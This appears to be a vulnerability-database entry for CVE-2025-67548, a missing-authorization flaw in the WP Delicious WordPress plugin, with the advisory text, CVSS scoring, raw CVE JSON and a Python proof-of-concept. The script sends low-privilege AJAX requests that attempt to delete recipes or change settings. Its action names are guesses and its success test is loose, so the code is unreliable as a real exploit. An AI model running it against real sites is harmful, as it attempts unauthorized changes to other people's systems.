Security Vulnerability Report
中文
CVE-2025-67548 CVSS 6.5 MEDIUM

CVE-2025-67548

Published: 2025-12-09 16:18:30
Last Modified: 2026-04-27 17:16:43

Description

Missing Authorization vulnerability in WP Delicious WP Delicious delicious-recipes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Delicious: from n/a through <= 1.9.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

WP Delicious (delicious-recipes) <= 1.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67548 PoC - WordPress WP Delicious Broken Access Control # This PoC demonstrates the missing authorization vulnerability import requests import sys TARGET_URL = "https://vulnerable-site.com" WP_ADMIN_AJAX = f"{TARGET_URL}/wp-admin/admin-ajax.php" COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", # Replace with valid low-privilege user cookies "wordpress_logged_in_xxx": "user_cookies_here" } def exploit_missing_authorization(): """ Exploit the missing authorization vulnerability in WP Delicious plugin. This PoC attempts to access/modify resources without proper permission checks. """ # Step 1: Identify vulnerable endpoint # The plugin may have AJAX actions without capability checks vulnerable_actions = [ "delicious_recipes_delete_recipe", "delicious_recipes_update_settings", "delicious_recipes_get_private_data" ] for action in vulnerable_actions: # Step 2: Craft request with low-privilege session data = { "action": action, "recipe_id": 1, # Target resource ID "nonce": "" # May not be properly validated } try: response = requests.post( WP_ADMIN_AJAX, data=data, cookies=COOKIES, timeout=10 ) # Step 3: Analyze response if response.status_code == 200: # Check if unauthorized access was successful if "success" in response.text or len(response.text) > 50: print(f"[!] Potential vulnerability found: {action}") print(f"[*] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[*] Request failed for {action}: {e}") return False if __name__ == "__main__": print("CVE-2025-67548 PoC - WP Delicious Missing Authorization") print("=" * 60) if exploit_missing_authorization(): print("[+] Vulnerability confirmed!") else: print("[-] No vulnerability detected or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67548", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:30.350", "lastModified": "2026-04-27T17:16:42.560", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Delicious WP Delicious delicious-recipes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Delicious: from n/a through <= 1.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/delicious-recipes/vulnerability/wordpress-wp-delicious-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}